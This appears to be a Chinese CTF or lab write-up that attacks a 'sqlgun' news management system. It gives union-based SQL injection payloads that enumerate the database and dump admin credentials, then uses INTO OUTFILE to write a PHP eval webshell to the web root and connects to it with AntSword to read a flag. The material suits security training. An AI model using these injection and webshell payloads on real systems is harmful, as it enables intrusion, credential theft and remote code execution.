当前位置: 首页 > article >正文

sqlgun新闻管理系统

一,打开主页

1.输入框测试回显点

-1'union select 1,2,3#

出现回显点2

2.查看数据库表名

-1'union select 1,database(),3#

3.查看表名

-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='sqlgunnews'#

4.查看admin中的列名

-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='sqlgunnews' and table_name='admin'#

5.查看admin的账号密码

-1'union select 1,2,group_concat(id,admin,password) from admin#

二,MD5解密一下得出结果为admin

三,扫描了一下发现有一个phpinfo.php文件访问一下

1.我们来看一下里面有没有有用的信息

获得绝对路径

四,写入一句话木马我们来访问1.php

-1' union select 1,'<?php @eval($_POST[cmd]);?>',3 into outfile '/var/www/html/1.php' #

五,蚁剑连接

1.在根目录找到flag

2.点击flag


http://www.kler.cn/a/307576.html

相关文章:

  • Linux设置socks代理
  • 【MySQL从入门到放弃】InnoDB磁盘结构(一)
  • 腾讯云nginx SSL证书配置
  • uniapp 设置安全区域
  • 7天用Go从零实现分布式缓存GeeCache(学习)(3)
  • ESLint 使用教程(七):ESLint还能校验JSON文件内容?
  • 本地部署大语言模型详细操作步骤
  • Y电容(安规电容)的作用是什么?
  • 【C++】queue和priority_queue
  • Linux:进程(一)
  • 无人机建模详解!!!
  • [Leetcode LCR 154][Medium]-复杂链表的复制-链表
  • JSON数组
  • 通信工程学习:什么是接入网(AN)中的CF核心功能
  • dplyr、tidyverse和ggplot2初探
  • 一些学习three的小记录
  • RK3588九鼎创展方案在Arm集群服务器的项目中的应用分析​​
  • 关于决策树集成的一份介绍
  • IDEA 新版本设置菜单展开
  • Python 单元测试详解:Unittest 框架的应用与最佳实践
  • java.人机猜拳游戏
  • JVM 性能优化与调优-Shenandoah GC
  • [K8S]Forbidden: pod updates may not change fields other than
  • 【Linux】NAT
  • 医学数据分析实训 项目三 关联规则分析预备项目---购物车分析
  • Django——多apps目录情况下的app注册